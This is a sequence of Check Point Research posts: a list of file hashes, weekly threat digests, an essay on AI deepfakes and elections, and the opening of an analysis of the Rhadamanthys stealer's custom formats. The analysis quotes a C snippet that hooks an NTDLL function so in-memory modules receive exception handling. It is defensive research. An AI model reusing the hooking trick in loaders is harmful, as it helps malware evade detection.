3de22926115f4232b1fed26a4ea45dc9c8ad551f
3f92880d212006e2812dd11b945893616305bd65
4094f97258442bc1df5047fbd08b2e4cdf707788
432dc5cf8b64c591b8d5d80c6c94879b41fbcb25
446343828f9ea0c3da92e88401b06dcad2564efc
476f4ebc66a430e5211a45d3fd987e06adbb87e1
4a76ba6b31fb4afded84a31aac37961333221d4e
52ec5ca7ebfed9fd46e6995f295da9b58f8d0db7
56b41bfebfefe17fdb3f983c88b6ba1e509f4673
56fa7cece82be67830de5fda699fb4e8fb8c8ab8
5eb95c21bc3171b7e7a72d015d632d7cd92eeff5
631ce6b5704cba5087d8bb1f7ec294f1838f875a
6b6b98ce05a28d2089f40f814bd488f9d044b2ac
6d59089e1bd588e5dff8ddc22a7b5d489bb23099
6fa5b9e94f0ad29807fdf54fe686407988d22675
70a82522c0ff3d0ff1034cb75eb4c655fee8f16d
72db30e960256be5723cf497671af031b99da702
78fc5666b1599fb45a8de9ead18c0c88762b3fb0
7a982b71d4f3c9c280922b3a7446d5b37aea9ea5
7f034c654586f36718b0d8e2cf20898a2434b9be
7f3c4ea235a975d7373263b9122bc5f1b4014dc7
8136a49c3688c2205936dd87bb9fb0713969e74c
841e5093c48ff58949956a76638928f3a70dea09
85fda5b03b10c5ca740d8b402623e74bf47a1459
8a8b6182bf00f584446d8f5251fc10bc3e634e41
8f92c596c39bb90ede4434984e20ce9910b15161
90a7c84ca422b2a03d5be16b90805bb298f31ddb
90b44246a15df7ce331475cecdb32b907958c017
9417bb08836439b05e950bc397a7fcc1b6d65c3e
95aa52f8d8c9e2cc3f7e408a12c9b547efabef5f
9aaf87c7bd580bcde421bd45149534e1e94e5052
a3e4b4f0f6572b50ed72683ebef08d4f3ae9b28e
a4f5c257bbc2d231b62c54dbf1948475eeeae01d
a7a22b1637710ee68fe966c72a1efbef4b04f94f
afcc5ffd986c8a3097644db452f478318df175e3
b37b50f13fe9c7e749b3ccdc5cb27a5c75f563e8
b95f28e3e371c4e3bcfaf5d125b108ce0882492e
c184116dc08189023ca32d80a5f683c5230aa2d5
c7fdc4e9085dd5c9277fae611a5346e1ed822e05
cc136bc74eaa921fb852140b9d9fda9ea9bc9d57
ce7acbe0e521474fdcc337e6b6e93bd45e1f0e01
d01aeb3b10ed5f39623eaa2be7a5d45b4eb9daf3
d2cace3f1a8f7399b56df20af8c6cc73721c7437
d31f0105aaf6a63c9e74474c25a58fd876efa7a0
d5d6ca1af6f85497a600dec6068a179999f53ebe
d67ebf4f01fc1c6cb1089402cd4a75b4afae2907
d833ec0f14bfc04ba0739387844e6971d879fd73
d8d1840820cb74e3a40d09e6123aba21735fc0c4
d8e9eb2b5db47efd11066826c21e0300610d1871
db936d1615f6bb43c70af75b48f9a188ddd616b4
dc5898884939ac85426c75c053b4248fbc157d59
de89d77a580333433dad82418e94277288eeac3c
e08d2d4008b7aef450428400516c6642ddac7ccd
e2dfed7211a9277b4e43259cededb73b2bed90ce
e8162589c2594823a9847495389d6d3edeaea679
e95f2c4cd4bc70c8571c951ac7bc0578d22847aa
ee25058728ee4b1fcbe45c39d06d8b577f5d3cd2
f185ce72e88cafcf94ad96f5f71278daa2a5c1e6
f3b5d39e69712947dcdc71d5738518caf53a8d98
f4a1652c439b0a46218f08a11c913cab04895d84
fb52f09ca044e707dc435417c8fdd3a9e9949bee

The post Guarding Against the Unseen: Investigating a Stealthy Remcos Malware Attack on Colombian Firms appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 11th September, please download our Threat_Intelligence Bulletin.

TOP ATTACKS AND BREACHES

• Check Point warns of a recent Email phishing campaign abusing the data visualization tool – Google Looker Studio. Attackers use the tool to send slideshow emails to victims from official Google accounts, instructing them to visit 3^rd party websites to collect cryptocurrency. The websites will then prompt the victims to input their credentials and thus they still them.

Check Point Harmony Email provides protection against this threat.

• $41M in cryptocurrency have been hijacked from the Curaçao based online casino Stake.com. According to the company, only its own funds were impacted, while customers’ accounts were not compromised. The FBI has attributed the attack to the North Korean Lazarus APT group, which is notorious for having stolen large amounts of cryptocurrency in recent years.
• Ransomware group Ragnar Locker has leaked 400GB of information that it claims to have exfiltrated in a breach of an Israeli hospital Mayanei HaYeshua last month. The attack forced the hospital to suspend its network operations a brief period. The group allegedly holds a total of 1TB of information, including patients’ medical details, and threatens to disclose it if its ransom demands are not met.
• United States security agencies have uncovered an Iranian nation-state cyber campaign operated by multiple threat groups, and targeting a US aeronautical organization. The attackers exploited Zoho ManageEngine vulnerability CVE-2022-47966 to gain access to the organization’s network, as well as Fortinet vulnerability CVE-2022-42475 to establish persistence on the organization’s firewall.

Check Point IPS provides protection against those threats (Zoho ManageEngine Remote Code Execution (CVE-2022-47966), Fortinet FortiOS Heap-Based Buffer Overflow (CVE-2022-42475))

• The city of Seville, Spain, has suspended all digital activity after being hit by a ransomware attack. The city has announced that it refuses to negotiate with the ransomware group LockBit, which had assumed responsibility for the attack and demanded a ransom of $1.5M.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Lockbit; Ransomware.Wins.Lockbit)

• Hong Kong high technology business compound Cyberport has disclosed a breach of its network. The Trigona ransomware group has assumed responsibility for the attack.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Trigona; Ransomware.Wins.Trigona)

VULNERABILITIES AND PATCHES

• Apple has released security patches for two zero-day remote code execution vulnerabilities affecting its products, which were actively exploited in the wild. The vulnerabilities allow attackers to gain control of victims’ devices by sending malicious images, without any interaction required on the victim’s side (“zero-click”). The usage of the vulnerabilities was attributed to Israeli company NSO’s Pegasus spyware.
• Cisco has published advisories for multiple vulnerabilities affecting the company’s products. The vulnerability CVE-2023-20238 is a critical pre-authentication remote code execution vulnerability which affects the BroadWorks Application Delivery and Xtended Services platforms. Another vulnerability, CVE-2023-20269, is a credential-theft vulnerability affecting Cisco ASA and Cisco FTD, and according to Cisco is active exploited by the Akira ransomware group, and has yet to be patched.
• Redwood Software has patched its JSCAPE MFT Server product to cover a Java deserialization arbitrary code execution vulnerability, CVE-2023-4528. MFT servers are increasingly targeted by ransomware groups recently, as breaching them allows access to data held by many companies.
• Google has published Android’s September security advisory, which includes fixes for 33 vulnerabilities. Among the vulnerabilities addressed is CVE-2023-35674, a high severity privilege escalation vulnerability that has been actively exploited in the wild prior to the patch.

THREAT INTELLIGENCE REPORTS

• Check Point researchers have analyzed the potential impact of the emerging generative AI technology on election influencing operations. Generative AI is capable of constructing individually tailored audio-visual propaganda to target voters on a massive scale, causing a heightened risk to democratic election integrity. To combat the issue, Google will require disclosure on political advertisements involving AI.
• Ukraine’s CERT has identified a campaign operated by the Russian nation state group APT-28 targeting a Ukrainian critical energy infrastructure facility. The threat actors used targeted phishing emails as the initial attack vector to distribute the malware.
• Researchers have found a novel attack targeting an organization using the MinIO cloud framework. The attackers managed to convince the target to update its environment to a vulnerable version, and used a series of vulnerabilities discovered this year to try and gain control of the victims’ network.
• An Android spyware campaign targeting the Uyghur minority has been discovered. The campaign, which was attributed to a Chinese APT group, utilized modified versions of the Telegram and Signal Android apps that were available on the official Google Play platform. When installed, the apps allowed the attackers to spy on victims’ devices.

The post 11th September – Threat Intelligence Report appeared first on Check Point Research.

Executive Summary

Since it burst on the scene just a short time ago, AI has impacted many facets of our daily life. In this article, we examine the potential impact of recent advancements in generative AI technologies on upcoming democratic elections. In particular, we look at two primary shifts: AI’s ability to craft persuasive, tailored texts for numerous individually targeted dialogues on a massive scale, and its proficiency in generating credible audio-visual content at low cost. Many observers are concerned that these developments risk detaching public discourse from factual, ideological debates, potentially undermining the very essence of democratic elections.

Highlights:

• We discuss potential negative effects of AI-generated propaganda as well as some measures that can be taken to reduce the negative effects. This includes cooperation of multiple stakeholders, including AI providers, governments and the society.
• We illustrate that overreacting to the threat can make the issue even worse and draw a parallel to past concerns over voting machine vulnerabilities.
• We discuss how reaction to the distortion of political dialogue by AI could hinder public engagement in political discussions. We discuss that what is deteriorating is our trust in the public discourse, and unbalanced warnings might erode this trust further. This is the real danger – before new technology disengages us from reality, the fears and warnings about it might yield a hazardous outcome, namely, a loss of trust in the democratic apparatus

Figure 1 – AI generated image from a GOP advertisement on YouTube illustrating dysphoric conditions following Biden’s re-election.

US 2020 Presidential Elections and the Concerns of “Election Hacking”

Democratic elections rely on a few key elements: free public discussion – a public marketplace of ideas where conflicting views are confronted and weighed, a fair voting process, and a guaranteed peaceful transition of power, according to ballot results. Each one of these elements has faced challenges in recent years.

In the lead-up to the U.S. 2020 elections, there was heightened focus on the reliability and resilience of voting machines. Numerous conferences and public vulnerability tests took center stage. DefCon’s “Voting Village” initiative provided a platform for hackers to challenge the security of various voting machines from across the U.S., with any detected vulnerabilities often making headlines and receiving extensive news media coverage. In response to the rising concerns about potential electoral hacking, countries like the Netherlands, which had long embraced digital voting, reverted to paper-based manual processes. Meanwhile, in the U.S., the federal government allocated budgets in the billions to enhance the infrastructure of state voting machines. However, critics contended that such tests are conducted under non-realistic conditions. Notably, as of this time, there have never been any reports of attempts to hack voting machines with the intention of manipulating election results globally.

The reasoning behind this might be attributed to the intricacy involved. Manipulating election results is not a simple undertaking. It requires breaching multiple distributed offline systems and, crucially, doing so without detection. Any raised suspicions could immediately invalidate the count, as paper backups offer a reliable method for manually cross-checking the integrity of the vote. These challenges may explain why this has not, to the best of our knowledge, actually been attempted. But this does not mean that the democratic system was not under attack.

It is now evident that the primary goal of attacks on democratic election systems was not necessarily the promotion of specific candidates, but to undermine the democratic system itself. Influence campaigns aim to exacerbate divisions within the targeted society, often by supporting extremists from all sides, and to erode trust in the credibility of the voting system. Continuous public discussion and concerns regarding the reliability of voting machines serves exactly this purpose. Weakening the democratic system aids both the external and internal agendas of the attacking non-democratic forces. On the international front they weaken their adversaries, and on the domestic, they provide arguments for their own campaigns that emphasize the perceived flaws of Western democracy, thereby diminishing the local population’s aspirations for democratization. The underlying message is, “Look at those hypocrites in the U.S. with their flawed democracy – that is not our role model.”

In retrospect, the continuous efforts to uncover vulnerabilities in electronic voting machines, which were mostly meant to bolster their credibility and strengthen the democratic system, may have inadvertently had the opposite effect. It is possible that they actually eroded public confidence in the trustworthiness of these systems and the legitimacy of election results. While assessing the robustness of voting machines in artificial conditions, such as providing unrestricted access at events like “Voting Villages” can be beneficial for conventions, media exposure, and the cybersecurity industry, there are reservations. Many question whether the identified vulnerabilities are truly exploitable, if they are even targeted by adversaries, or if the potential risks associated with them outweighs the resulting decrease in public trust in election outcomes.

This perspective may have been what led CISA (the Cybersecurity and Infrastructure Security Agency) to rethink its communication strategy. Instead of persistently drawing attention to the vulnerabilities and shortcomings of voting machines, CISA chose to focus on positive messages throughout 2020, asserting the US voting system’s security and dependability. This change in CISA’s stance culminated in President Trump dismissing its director, Chris Krebs. While Krebs proclaimed these elections were the most secure in American history, President Trump vehemently disputed the election results, culminating in the January 6 events at the Capitol and interfering with a peaceful transition. The process has come full circle with DEF CON “voting village” officials now defining their mission, in light of the “Big Lie” theories, to, “fight against conspiracy theories, misinformation, claims of hacks that didn’t happen, claims of weirdness that didn’t happen”.

FOX Network recently agreed to pay $787 million as part of a lawsuit brought by Dominion, a voting machine manufacturer. FOX was sued for knowingly falsely claiming that Dominion machines altered the election results in favor of President Biden.

Artificial Intelligence and Automated Texts

As the next cycle of the US Presidential elections in 2024 approaches, there is mounting apprehension that advancements in AI can be used to introduce novel disruptions to the democratic process. Previous technology was primarily used in influence campaigns to curate and match specific content with targeted audiences. Today, the emerging wave of technology is increasingly adept at autonomously crafting tailored content, elevating concerns about its influence on public discourse.

The Cambridge Analytica scandal that erupted in 2018 was about the unauthorized use of social media users’ information. This information was utilized to build voter profiles and deliver content that aligned closely with the targets’ worldviews, making them more effective tools of persuasion. The bottleneck in these influence operations was the cost of content development, which required human content creators proficient in the targeted country’s language, culture, politics and psychology. However, new AI technology bypasses this bottleneck by offering cost-effective personalized content. Since the launch of ChatGPT in late 2022, it has become easy to automatically generate personalized text. Currently, you can set specific conversation parameters such as age, gender, and geographic location, along with objectives which are automatically fed into the API. This produces an impressive and convincing personalized text aimed at achieving the predefined objective. Output can be used to generate full conversations between AI and the targeted individual. Similar chatbots are already in commercial use, for instance, as efficient customer service tools.

The real breakthrough lies in the ability to produce this personalized content on a massive scale at a low cost. The quality of the text has improved to such an extent that historian Prof. Yuval Noah Harari calls it “hacking humans”, referring to AI’s capacity to anticipate and manipulate our feelings, thoughts, and choices beyond our own self-understanding.

In the context of elections, researchers proposed a thought experiment where AI systems, which they term “Clogger and Dogger”, operate on both sides of the political map to maximize the use of micro-targeting and behavior manipulation techniques. They warn that as a result, future political discourse might lose its significance. The discourse between bots and individual voters may no longer focus on relevant political issues at all. Instead, it can be used to divert attention away from an opponent’s message or other important discussion topics. In addition, it’s important to note that AI is current AI systems are not necessarily accurate but will generate content that matches the objectives it was assigned. In such a scenario, the winners of an election would have prevailed not due to their political stance or message resonating with the voters, but because of their financial ability to leverage this superior system for success.

In this way, without resorting to censorship or force, the primary requisite for democratic elections — a free marketplace of opinions — could be destroyed. As the newly elected officials were not voted in for their ideological platform, it stands to reason that they would not be committed to implementing these policies. They might even continue to employ “Clogger” or “Dogger” to make policy decisions that maximize their chances of being re-elected.

AI and Fabricated Audio-Visual Artifacts

One of the most significant implications of emerging AI technology is its capacity to fabricate deceptive voice and video recordings. This advancement threatens to blur the lines between genuine and falsified accounts of events. With such tools becoming increasingly accessible and affordable, there’s a growing concern that distinguishing between authentic reports and fabricated deep fakes will become nearly impossible, especially in the political arena. While initially used for scams like impersonating individuals for financial gains, this technology has already been weaponized politically. For example, during Chicago’s recent municipal elections, a doctored audio clip emerged, allegedly of candidate Paul Vallas, supporting police aggression. Other such fabrications, claiming to be Elizabeth Warren or Ukraine’s President Volodymyr Zelensky, were also found online. An AI-crafted video from the Republican National Committee, depicting fictitious dystopic scenes under Joe Biden’s rule, raises questions regarding its novelty: how is it different from previous Hollywood fabrications and their utilization for political campaigns. The real change, however, is the affordability and availability of these tech tools, heightening worries about their misuse in politics.

These recent advancements in AI, the ability to create personalized texts and engage in micro-targeted dialogues that could render discussions devoid of factual grounding, along with the creation and spread of deep fakes, have far-reaching implications for democratic

Figure 4 – AI fabricated images: The pope wearing a puffer coat and former US President Trump resisting arrest. Sources: Forbes, BBC

processes. They negate the first requirement of democratic elections – the existence of a free meaningful exchange of ideas and opinions. They strike at the very heart of human communication and our ability to have open and meaningful discussions prior to elections.

Tackling the Immediate AI Challenge

It is worth emphasizing that, unlike previous technological challenges for which the solution was technology-based, these new developments challenge something more fundamental: our relationship to truth itself. We are now grappling with complex issues that are more philosophical and moral than they are technological. Epistemological issues relating to the nature of knowledge, the reliability of data sources, the reputation of public figures, and the very way we shape our understanding of reality. These challenges are reshaping the landscape of political discourse, calling into question the authenticity of information, and demanding a fresh perspective on the core values of communication and integrity in the democratic process.

To effectively tackle these challenges, we need the cooperation of multiple stakeholders. First of all, AI providers must take proactive measures to prevent the abuse of its processes, and regulators need to reassess and update guidelines. As a society, we must engage in deep reflection on the nuances of freedom of expression and the way we conduct ourselves in this digital era.

The primary condition for evaluating information is understanding the context in which it appears. This involves understanding the information source, the speaker’s identity and motivations. Therefore, some proposals emphasize the necessity to reveal these details together with the publication. When it comes to conversations with bots, there’s a demand to declare the identity of the speaker as an AI chatbot. There’s also a call to clarify the AI’s intentions, possibly by revealing the prompt given to the AI agent. Fung & Lessig from the “Clogger” example propose something in the style of: “This AI-generated message is being sent to you by the Sam Jones for Congress Committee because Clogger has predicted that doing so will increase your chances of voting for Sam Jones by 0.0002%”. Yuval Harari raises an issue related to the approval of AI participation in political discourse: The First Amendment guarantees freedom of expression to humans. Is this right also reserved for AI? However, as the integration of AI in thought processes (like trying to use ChatGPT in the creation process of this article, with very limited success) becomes more complicated, it becomes increasingly challenging to distinguish the origins of a text or idea. Regulation enforcement is critical as relying on an individual’s capacity to recognize source reliability was shown to be ineffective.

In the absence of a ban on AI participation in popular discourse, it’s evident that the responsibility for AI-produced content falls on the users and the developers.  The precise boundary will be clarified in the courts through a dialogue between regulators and those who interpret the regulations.

Another tension exists between the right to freedom of expression and the pursuit of truth. Until now, freedom of expression has been prioritized. From the Ten Commandments to American law, lying is not generally considered a crime. Tom Wheeler, ex-FCC chairman, highlighted the sad reality: deception is permissible, especially in politics. A recent example is a 2012 decision by the U.S. Supreme Court that led to the nullification of a law prohibiting the false representation of military history. A local candidate in California was caught claiming to have received a medal he had not, but the Supreme Court ruled that the First Amendment takes precedence, and in practice, one cannot prohibit lying in public discourse. Given the risk of blurring the boundaries between documentation and fabrication, it is worth reconsidering the balance between these two values.

Should someone who produces an audio file, image, or video intended to fabricate a false representation of reality bear criminal responsibility? The importance of trustworthiness in our public discourse is likely to take on an even more central role in the future. In a reality where it is increasingly challenging to identify forgeries, the source and context become paramount. In such a situation, the credibility of a person and information source becomes increasingly crucial. When the truth is endangered, deterrence is created through a decreased tolerance for lies and deceivers. Politicians who once prided themselves on openly lying, may soon be viewed differently. Credibility and a trustworthy reputation become valued assets and it is critical that there be political accountability for lying.

Media and Technological Solutions

In an era when traditional media grapples with the flourishing popularity of social media, there could be a potential pivot towards the former’s resurgence. As people seek reliable sources, they may seek out mainstream outlets that are more committed to diligent fact-checking, editorial standards, and accountability. Projects aiming to provide a broader context to news items will be increasingly important.

Multiple initiatives focusing on source identity might be the start of a new trend. WorldCoin, introduced by Sam Altman from OpenAI is a digital identification platform whose goal is to provide people with a way to verify that they are interacting with real humans. Despite the criticism directed at Twitter, its promotion of the blue checkmark and other verification mechanisms are steps in the same direction. Increasing the cost of signals to make them more difficult to fake, thereby increasing their reliability, could be an applicable solution here, too. A monthly fee for Twitter constitutes such a cost and could hinder the creation of networks of thousands of bots. Preference for real-life events over virtual ones, as we have already seen in the popularity of large-scale conventions as part of elections campaigns,  could also be considered as another way of increasing signal cost.

Exaggerated Warnings Could Make Things Worse

Until now, we discussed the potential dangers stemming from AI capabilities and the ways to mitigate them. However, there’s a possibility that the repeated warnings and emphasis on AI’s dangers might exacerbate the problem. Just as the overstated focus on the vulnerabilities of voting machines might have inadvertently weakened democratic resilience by eroding public trust in voting mechanisms, we could be facing a similar peril with AI.

Conclusion

It’s essential to keep things in perspective and remember that we’ve always grappled with incomplete information about reality, and that manipulations, rhetorical twists, and outright lies did not originate in the AI era. Edited portraits existed even during Abraham Lincoln’s time, and it’s highly likely that a 2023 news reader’s perception of current events is not worse than in earlier times when “news” was seldom up to date and verifying facts was much more challenging. A review of cases of actual AI misuse suggests it is still a long way from massively influencing our perception of reality and political discourse.

What is deteriorating is our trust in the public discourse, and unbalanced warnings might erode this trust further. In our opinion, this could prove to be the real immediate danger – even before new technology disengages us from reality, the fears and warnings themselves can create a loss of trust in the democratic apparatus. It’s crucial to stress that the field of public discourse, which never guaranteed absolute objectivity and fidelity to the truth, isn’t broken now either. However, eroding trust in electoral mechanisms and their outcomes may increasingly erode the losing side’s willingness to concede defeat, which in turn can affect a peaceful transition of power.

The post Elections Spotlight: Generative AI and Deep Fakes appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 4th September, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• The FBI announced operation ‘Duck Hunt’ dismantling the Qakbot (Qbot) malware operation that is active since at least 2008. Qakbot has been known to infect victims via spam emails with malicious attachments and links, while also serving as a platform for ransomware operators. It has impacted over 700,000 computers worldwide including financial institutions, government contractors and medical device manufacturers.
  Check Point Research is sharing its analysis of the Qakbot malware and its operations over the years.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Trojan.Wins.Qbot; Trojan.Win.Qbot; Trojan.Downloader.Win.Qbot; Trojan-PSW.Win32.Qakbot; Trojan.WIN32.Qakbot)

• Major clothing brand Forever 21 has disclosed a data breach that affected almost 540K current and former employees. The leaked data consists of personal information such as names, dates of birth, Social Security numbers, bank account numbers and employees’ health plans information.
• American golf gear company Callaway has suffered a data breach that affected the personal information of over 1M of its clients. The exposed information includes account passwords and answers to security questions, as well as names, addresses, emails, phone numbers and order histories. According to the company, no payment card numbers or Social Security numbers were leaked.
• American entertainment giant Paramount Global has confirmed a data breach that potentially resulted in the exposure of clients’ and employees’ personal information. The leaked data includes names, dates of birth, Social Security numbers, driver’s license numbers and passport numbers.
• The University of Michigan has experienced a cyber-attack resulting in the loss of internet access and other business functions across the university. As a precaution, the school took all of its services offline.
• AI-powered coding platform Sourcegraph has revealed a data breach potentially affecting clients’ information such as license keys, names and email addresses. Sourcegraph claim that the access gained by the threat actors didn’t lead to a modification or copying of private data or code.
• BlackCat (AlphV) ransomware group has taken responsibility for the attack on Forsyth County, Georgia, which happened in last June. The attack resulted in the encryption of over 350GB of data.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.BlackCat, Ransomware_Linux_BlackCat)

VULNERABILITIES AND PATCHES

• Threat actors are actively exploiting critical RCE vulnerabilities (CVE-2023-36844 to CVE-2023-36847) in Juniper EX switches and SRX firewalls, after a proof-of-concept exploit was released. Successful exploitation will allow unauthenticated attackers to remotely execute code on unpatched devices. Juniper has also warned of a denial-of-service bug (CVE-2023-4481) in Junos OS and Junos OS Evolved.
• A proof-of-concept exploit code has been shared for a critical SSH authentication bypass vulnerability (CVE-2023-34039) in VMware’s Aria Operations for Networks analysis tool (patched with the release of version 6.11). Successful exploitation could allow remote attackers to bypass SSH authentication on unpatched appliances and access the tool’s command line.
• Netgear has released patches for two high-severity vulnerabilities (CVE-2023-41182 and CVE-2023-41183) affecting one of its router models and its network management software.
• Researchers have identified a critical severity vulnerability (CVE-2023-40004) in All-in-One WP Migration Extensions, a popular WordPress plugin used for website migrations. Successful exploitation could result in an unauthenticated access token manipulation.

THREAT INTELLIGENCE REPORTS

• Check Point Research has published a technical analysis highlighting the similarities between the Rhadamanthys info stealer and the Hidden Bee coin miner. The similarities include their overall analogous design, implementation, and other custom executable formats.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (InfoStealer.Wins.Rhadamanthys.C/D)

• Researchers have observed a new campaign suspected as related to FIN8 hacking group, now targeting Citrix NetScaler ADC and Gateway servers while exploiting the critical-severity RCE vulnerability CVE-2023-3519 which had been patched last July.

Check Point IPS provides protection against this threat (Citrix NetScaler Remote Code Execution (CVE-2023-3519))

• Researchers detail post remediation efforts by UNC4841, a threat actor suspected as a Chinese hacker group, which targeted US government email servers using a zero-day vulnerability in Barracuda Email Security Gateway (ESG) appliances. The attacks resulted in the compromise of email accounts and the theft of sensitive data.

Check Point IPS and Threat Emulation provide protection against this threat (Barracuda Email Security Gateway Command Injection (CVE-2023-2868); Trojan.Wins.Saltwater; Exploit.Wins.CVE_2023_2868)

The post 4th September – Threat Intelligence Report appeared first on Check Point Research.

Research by: hasherezade

Highlights

• Rhadamanthys stealer’s design and implementation significantly overlap with those of Hidden Bee coin miner. The similarity is apparent at many levels: custom executable formats, the use of similar virtual filesystems, identical paths to some of the components, reused functions, similar use of steganography, use of LUA scripts, and overall analogous design.
• Check Point Research (CPR) highlights and provides a technical analysis of some of those similarities, with a special focus on the custom executable formats. We present details of RS, HS, and the latest XS executable formats used by this malware.
• We explain implementation details, i.e. the inner workings of the identical homebrew exception handling used for custom modules in both Rhadamanthys and Hidden Bee.
• Basing on the Hidden Bee format converters, we provide a tool allowing to reconstruct PEs from the Rhadamanthys custom formats in order to aid analysis.
• We give an overview of particular stages and involved modules.

Introduction

Rhadamanthys is a relatively new stealer that continues to evolve and gain in popularity. The earliest mention was in a black market advertisement in September 2022. The stealer immediately caught the attention of buyers as well as researchers due to its very rich feature set and its well-polished, multi-staged design. The malware seller, using the handle King Crete (kingcrete2022), and writing mostly in Russian, came across as very professional. Although malware sellers are not necessarily the original authors, the way King Crete responded to questions suggested an in-depth knowledge of the code, sparking curiosity and speculation on what other malware he may have authored (For more on the background and distribution of Rhadamanthys, see our previous article). The development of the malware is fast-paced and ongoing. The advertisement process is not stagnant either, with updates published i.e. on a Tor-based website. The latest advertised version up to date is 0.4.9 (Figure 1).

In addition to the rich set of stealing features, Rhadamanthys comes with some obfuscation ideas that are pretty niche. While the initial loader is a typical Windows PE, most of the core modules are delivered in the form of custom executable formats. The seller’s advertisement describes this feature in vague terms, which provide assurance about the quality without giving any hints about the implementation. As it says in the ad, “all functional operations are executed in memory, no disk packing operations, with the Loader that can execute loading in memory, it can perfectly realize memory loading operations” (Figure 2).

Multiple researchers (i.e., from Kaspersky[2][3], ZScaller[4]) quickly noticed the similarities between the formats used by Rhadamanthys and the ones belonging to Hidden Bee, which is another complex malware consisting of multiple stages. Hidden Bee first appeared around 2018, and its final payload was a coin miner implemented by LUA scripts. Its main distribution channel used to be an Underminer Exploit Kit. Initially, it seemed that a lot of effort was put into the malware development. However, as time went by, it became more and more rare to find new samples. The last ones were observed in 2021. It is possible that the mining business no longer proved as profitable to the authors, so they decided to repurpose the code and began selling it to distributors.

In this report, we review the custom formats used by both malware families and highlight their similarities. We present arguments supporting the theory that Rhadamanthys is a continuation of the work started as Hidden Bee.

We also offer converters that can reconstruct PE files from the custom formats, which enabled us to circumvent some of the problems other researchers noted while analyzing this malware and quickly reach the core of the stealer’s logic.

In the first part of the article, we show the Rhadamanthys execution chain, provide details about the formats and PE reconstruction, and compare their similarities with the Hidden Bee. In the second part, we show the code logic and how the stealer functionality is deployed.

NOTE: For the sake of readability, we use a convention that light mode IDA screenshots are related to Hidden Bee, while dark mode to Rhadamanthys.

The joy of custom formats

The use of customized executable formats in malware loaders is not something new. It is a form of obfuscation, making it more difficult for memory scanners to detect the loaded sample, as well as presents an additional obstacle for researchers during the analysis process. While most malware authors stick to writing custom PE loaders, some go further and modify selected parts of the format by their own creativity. Even more rare are components where the customization is advanced enough to make it a completely different format that has little or no resemblance to the PE.

The analysis of this phenomenon was described in the session “Funky malware formats”, presented at SAS 2019. One of the mentioned examples was a format used by Hidden Bee. However, the set of custom formats that this malware offered over time is very rich, and not all of them have been covered in the talk.

Below, we will highlight two of the Hidden Bee formats that have the most in common with the ones used nowadays by Rhadamanthys. They will become a base for further comparison.

Hidden Bee formats: NE and NS

In a Malwarebytes article from 2018, two Hidden Bee formats have been mentioned: NE and NS, as well as their loading process. As we show later on, both of those formats share elements with the ones used by Rhadamanthys. In the NE format loader, we found some functions that also occur almost unchanged in the current malware’s components. The NS format is even more noteworthy as it is a direct predecessor of the formats used by Rhadamanthys.

The NE format

NE is the simpler of the two mentioned formats, more closely resembling PE. The custom header is a replacement for the DOS header:

WORD magic; // 'NE'
WORD pe_offset;
WORD machine_id;

The rest of the headers are identical to PE, and only the “PE” magic identifier was erased.

As mentioned in the article [8] “The conversion back to PE format is trivial: It is enough to add the erased magic numbers: MZ and PE, and to move displaced fields to their original offsets. The tool that automatically does the mentioned conversion is available here.”

While the NE format by itself is not particularly interesting, by looking inside the converted application, we can see some functions almost identical to the ones found in Rhadamanthys.

Handling exceptions from a custom module

Custom loading some crucial fragments of the PE structure, such as imports and relocations, is relatively easy, but problems can occur if we want to convert a PE file with an exception table. Imagine that some of the code of our implant has try-catch blocks inside. The try block may cause an exception to be thrown, and the catch block is where they are normally handled. The list of those handlers is stored in the Exception Table, which is one of the Data Directories within a PE. If, for any reason, the proper handler is not found, the corresponding exception causes the application to crash. (For a more detailed explanation, reference Microsoft’s documentation). Interestingly, although there are many malware families that use custom loaders, they usually don’t address this part of the PE format. However, Hidden Bee, as well as its successor Rhadamanthys, don’t shy away from it.

Let’s look into the main function where the NE module execution starts – first, a 64-bit example:

The first step is a simple verification of the NE magic. When the check passes, the module initializes its exception directory (using the function denoted as add_dynamic_seh_handlers).

Next, the error mode is being set to 0x8003 -> SEM_NOOPENFILEERRORBOX | SEM_NOGPFAULTERRORBOX | SEM_FAILCRITICALERRORS. That means all error messages are muted, most likely to ensure stealth, just in case some of the exceptions within the module would not be handled properly.

The function denoted as add_dynamic_seh_handlers shows how the exception handling for a custom module can be implemented for a 64-bit application:

The solution looks fairly easy: the exceptions table is fetched from the module and then initialized by the Windows API function RtlAddFunctionTable. Thanks to this, whenever the exception is thrown from within the custom module, an appropriate handler will be found and executed.

However, the mentioned API function can be used only for 64-bit binaries and has no 32-bit equivalent. So, how do we manage an analogous situation for a 32-bit module? Let’s have a look at the 32-bit version of the NE module:

In this case, the author goes another approach by hooking the exception dispatcher (KiUserExceptionDispatcher) within the NTDLL. More precisely, a call to ZwQueryInformationProcess within the RtlDispatchException is redirected to a proxy function. As we will see, the same trick is used by Rhadamanthys.

The original call to ZwQueryInformationProcess within NTDLL is replaced:

The redirection leads to the function denoted as proxy_func, which is within the NE module:

The proxy function instruments the call to the ZwQueryInformationProcess and alters its result. First, the original version of the function is called. If it returns 0 (STATUS_SUCCESS), an additional flag is set on the output.

This method of handling exceptions from a custom module was documented in the following writeup: https://web.archive.org/web/20220522070336/https://hackmag.com/uncategorized/exceptions-for-hardcore-users/

We can see that the proxy function used by the Hidden Bee module is identical to the one proposed in the mentioned article. Quoted snippet:

NTSTATUS __stdcall xNtQueryInformationProcess(HANDLE ProcessHandle, INT ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength)
{
        NTSTATUS Status = org_NtQueryInformationProcess(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength, ReturnLength);

    if (!Status && ProcessInformationClass == 0x22) /* ProcessExecuteFlags */
        *(PDWORD)ProcessInformation |= 0x20; /* ImageDispatchEnable */
    return Status;
}

The above code enables the ImageDispatchEnable flag for the process, and as a result, the custom module is treated as a valid image (MEM_IMAGE), even though, in reality, it is loaded as MEM_PRIVATE. This simple trick is enough for the exception handlers to be found.

Demo:

